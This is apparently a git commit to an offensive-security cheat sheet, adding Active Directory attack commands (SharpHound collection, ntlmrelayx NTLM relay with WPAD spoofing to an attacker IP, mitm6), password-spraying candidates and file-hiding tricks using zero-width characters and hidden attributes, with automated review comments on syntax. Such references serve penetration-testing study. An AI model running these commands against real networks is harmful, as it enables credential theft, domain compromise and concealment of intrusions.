BloodHound ZIP + Zero Width space tip

This commit is contained in:
Swissky 2020-01-19 22:46:45 +01:00
parent 590b7681e4
commit be0397fa68
3 changed files with 19 additions and 4 deletions

View File

@ -77,6 +77,8 @@
SharpHound.exe (from resources/Ingestor) SharpHound.exe (from resources/Ingestor)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb -SearchForest
SharpHound.exe --EncryptZip --ZipFilename export.zip
or or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
or or
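Review bot: the new `SharpHound.exe --EncryptZip --ZipFilename export.zip` line carries no collection method or domain, unlike the `-c all -d active.htb` invocations right above it, and no comment says what the two flags change, so a reader cannot tell whether it is a complete run or options to append to one; suggest a `# ...` line in the style of the other sections, or writing it out as `SharpHound.exe -c all -d active.htb --EncryptZip --ZipFilename export.zip`. Also, the added `-SearchForest` uses a single dash while the neighbouring `--domaincontroller` and `--LdapUser` use two; confirm the SharpHound.exe parser accepts both, otherwise use `--SearchForest` (the single-dash form belongs to the `Invoke-BloodHound` cmdlet below).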
@ -112,6 +114,7 @@
# -wh: Server hosting WPAD file (Attackers IP) # -wh: Server hosting WPAD file (Attackers IP)
# -t: Target (You cannot relay credentials to the same device that youre spoofing) # -t: Target (You cannot relay credentials to the same device that youre spoofing)
# -i: open an interactive shell # -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
``` ```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
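Review bot: the comment block above the new `ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access` line documents `-wh`, `-t` and `-i` but not `--delegate-access`, so the reader cannot tell what this line adds over the existing examples; add a `# --delegate-access: ...` line in the same style. The example domain `lab.local` also differs from the `active.htb` used in the SharpHound section of the same file; one placeholder domain throughout would be easier to follow.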
@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are : Most of the time the best passwords to spray are :
- Password123, mimikatz - P@ssw0rd01, Password123, mimikatz
- Welcome1/Welcome01 - Welcome1/Welcome01
- $Companyname1 : $Microsoft1 - $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*,Spring2020!,Summer2018? - SeasonYear : Winter2019*,Spring2020!,Summer2018?
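Review bot: the candidates are separated by `,` on the first line, `/` on the second and ` : ` on the third; since the new `P@ssw0rd01` entry extends the comma form, consider normalising the other lines to one separator so the list can be copied straight into a wordlist, or into a banned-password policy on the defending side, without cleanup.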
@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain mitm6 -i eth0 -d $domain
# spoofing WPAD and relaying NTLM credentials # spoofing WPAD and relaying NTLM credentials
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
or or
http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
``` ```
#### Drop the MIC #### Drop the MIC
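Review bot: good fix, the `http://` prefix on both `ntlmrelayx.py` lines was link-autodetection debris and is not a valid command; while here, the bare `or` lines inside the fenced block (the SharpHound block in the first hunk has the same) are not shell and will fail if the block is pasted as-is, so `# or` would be safer.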

View File

@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder.
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
```bash ```powershell
## Do not remove. Generated from /etc/issue.conf by configure. ## Do not remove. Generated from /etc/issue.conf by configure.
``` ```
Hide in plain sight using zero width spaces in filename.
```powershell
touch $(echo -n 'index\u200D.php') index.php
```
Clear the last line of the history. Clear the last line of the history.
```bash ```bash
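Review bot: the new zero-width-filename block is fenced as `powershell` but the command is shell syntax (`touch`, `$(...)`, `echo -n`), and the block above was switched from `bash` to `powershell` although its content is still a bash comment line; if the switch was made to stop the renderer choking on the ANSI bytes, say so in a comment, otherwise keep `bash` for both. Two correctness points on the command itself: `echo -n 'index\u200D.php'` does not interpret `\u200D` without `-e`, so the created name contains a literal `\u200D` rather than the invisible character (`printf 'index\u200D.php'` produces it in bash 4.2+); and U+200D is ZERO WIDTH JOINER, not ZERO WIDTH SPACE (U+200B) as the commit title says, so the prose should name the character it actually uses. Worth one line next to the trick for the reader on the defending side: the extra bytes remain visible with `ls | od -c`, which is the check a reviewer of a suspect web root would run.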

View File

@ -21,6 +21,12 @@
## Userland ## Userland
Set a file as hidden
```powershell
attrib +h c:\autoexec.bat
```
### Registry ### Registry
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
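Review bot: `attrib +h c:\autoexec.bat` only sets the Hidden file attribute, which Explorer shows once "Show hidden files" is enabled and `dir /a` or `attrib` lists regardless; the heading "Set a file as hidden" (which is also missing the trailing period its neighbours use) should say as much so it is not read as real concealment, and `c:\autoexec.bat` is an odd example path on current Windows, a placeholder such as `c:\path\to\file` would read better.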